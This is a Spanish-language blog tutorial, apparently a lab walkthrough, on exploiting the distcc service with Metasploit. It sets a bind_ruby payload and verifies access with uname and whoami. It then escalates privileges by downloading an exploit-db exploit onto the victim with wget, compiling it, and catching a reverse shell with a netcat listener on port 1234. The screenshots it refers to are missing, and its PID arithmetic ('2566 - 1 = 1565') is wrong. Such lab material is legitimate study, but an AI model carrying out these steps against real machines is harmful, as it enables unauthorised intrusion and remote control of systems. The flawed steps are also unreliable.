Explotacion de Vulnerabilidades Distcc




para comenzar abriremos una consola de backtrack, y luego ejecutamos el comando msfconsole 
esperamos a que se abra ala consola de metasploit, una ves allí ejecutamos el comando search distcc, este comando busca en la base de datos es exploits relacionados con distcc 

una ves terminado nos deberá  aparecer lo siguiente 
nos muestra el exploit que vamos a utilizar 



ahora seleccionamos el exploit y lo ejecutamos 




con el comando show options verificamos los parámetros que deben configurarse al exploit 




procedemos a asignar la IP de la maquina victima con el comando set RHOST



luego asemos una búsqueda del payload que utilizaremos con el exploit de distcc, con el comando show payloads



luego lo asignamos a el modulo con el comando set payload seguido del payload que seleccionemos en este caso cmd/unix/bind_ruby


verificamos que se aya realizado los cambios 




para ejecutarlo escribimos exploit 

si todo se hiso correctamente nos devera de mostrar algo como esto 


como se puede observar en la ultima linea, nos dice que se abrió una sentencia tipo shell, debemos tener en cuenta que en esta shell no podemos tabular como en las demás 


ahora comprobamos que estemos dentro de la maquina victima ejecutando uname -a 



y con que usuario estamos logueados utilizamos el comando whoami





ahora procedemos a escalar privilegios 

dentro de la maquina victima con la shell que acabamos de obtener descargamos el siguiente exploit con el comando wget "http://www.exploit-db.com/dowload/8572"



ejecutamos ls para listar los archivos que contenga este usuario entre ellos el exploit que acabamos de descargar 




ahora cambiaremos el nombre del archivo aunque la extensión de este cambie su contenido no lo ara 



luego compilamos el exploit con el comando gcc seguido del nombre del exploit -o y el ejecutable en este caso exploit 



luego en nuestra maquina backtrack abrimos una nueva consola, y configuramos netcat para que escuche por el puerto 1234, para que al ejecutar el exploit local la maquina victima nos permita ejecutar comandos remotos y tener el control sobre ella 





para ejecutar el exploit se necesita que el payload se encuentre en /tmp/run y el PID del proceso

ahora lo que debemos hacer es que la victima se conecte a nosotros por netcat mediante una shell remota
  


luego determinamos el PID del proceso 


luego lo que aremos sera tomar el numero del proceso y restarle el udve que en este caso es uno "2566 - 1 = 1565"

procedemos a ejecutar el exploit 







No hay comentarios:

Publicar un comentario